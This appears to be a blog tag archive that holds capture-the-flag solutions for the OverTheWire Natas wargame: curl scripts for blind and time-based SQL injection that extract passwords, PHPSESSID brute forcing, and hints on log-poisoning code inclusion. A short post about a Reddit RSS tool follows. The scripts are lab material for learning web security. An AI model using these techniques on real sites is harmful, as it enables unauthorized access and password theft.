Tag Archives: php

Collection of Natas

Natas 15
Attempt until the password substring matches

k=''
for v in {{a..z},{A..Z},{0..9}}; 
  do
    curl "natas15:$pw@"'http://natas15.natas.labs.overthewire.org/index.php'
     --data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'$k$v'%25'
     --compressed > out 2>/dev/null; 
    if [ `grep -c 'user exists' out` -gt 0 ]; 
      then k=$k$v; echo $k; break; 
    fi; 
done

Natas 18
Capture Password by introducing a 10 second sleep if the password is correct

#timeout.sh contains:
perl -e 'alarm shift; exec @ARGV' "[email protected]";


Test the duration of the curl command

for z in {0..33}; 
  do 
    w=0; 
    for v in {{a..z},{A..Z},{0..9}}; 
      do ./timeout.sh 2 bash -c "curl natas18:$pw@'http://natas17.natas.labs.overthewire.org/index.php' 
        --data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22'$pw$v'%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23' 
        --compressed > out 2>/dev/null" 2>/dev/null; 
        if [ $? -ne 0 ]; 
          then pw=$pw$v; 
          echo $pw; 
          w=1; 
        fi; 
    done; 
    if [ $w -eq 0 ]; then break; fi; 
done;

Natas 19
Search for session ID with a different page output

for k in {0..640};
  do
    curl "natas19:$pw@"'http://natas18.natas.labs.overthewire.org/index.php' -H 'Cookie: PHPSESSID='$k
     --compressed > out 2>/dev/null; 
     if [ `grep regular out | wc -l` -eq 0 ]; 
       then echo $k; 
       break; 
     fi; 
done

Natas 20
Brute Force for session ID after capturing ~500 new sessions (where username=admin) to determine common cookie elements, starts with 3, ends with 2d61646d696e.

for k in {0..64000}; 
  do
    curl "natas20:$pw@"'http://natas19.natas.labs.overthewire.org/index.php?debug=1'
      -H 'Cookie: PHPSESSID=3'$k'2d61646d696e' --compressed > out 2>/dev/null; 
    if [ `grep -E 'regular|username' out | wc -l ` -eq 0 ]; 
      then echo 'found: '$k; 
      break; 
    fi; 
    if [ $((k % 100)) -eq 0 ]; 
      then echo $k; 
    fi; 
done;

Other Hints

21 – Add %0A to trick the sessionwrite
22 – Simply change the form to send admin=1, then use the sessionID in the other site
23 – Ignore the redirect (and get the full webpage via curl)
24 – Break strcmp (make it fail)
25 – Log our php code into the *.log, then have the index.php ‘include’ the php commands we embedded in the log file.

Reddit RSS Tool

No longer maintained and disabled

 

Just wrote a RSS Tool for Reddit.

Currently, if you request an RSS from reddit, all the RSS links will point to the reddit comments. This is not ideal if the topic of the post is (for example) an image. There is no need in going through to the reddit comments first, and then clicking again to reach the image.

This tool will allow you to directly link to the aforementioned image directly from RSS.

To try it out, click here (hosted on this website).

 

I had a few considerations in mind, and as this idea spawned from mobile device usage, two things came to mind

  • Ease of Use
  • Bandwidth conservation

By eliminating the 2-step process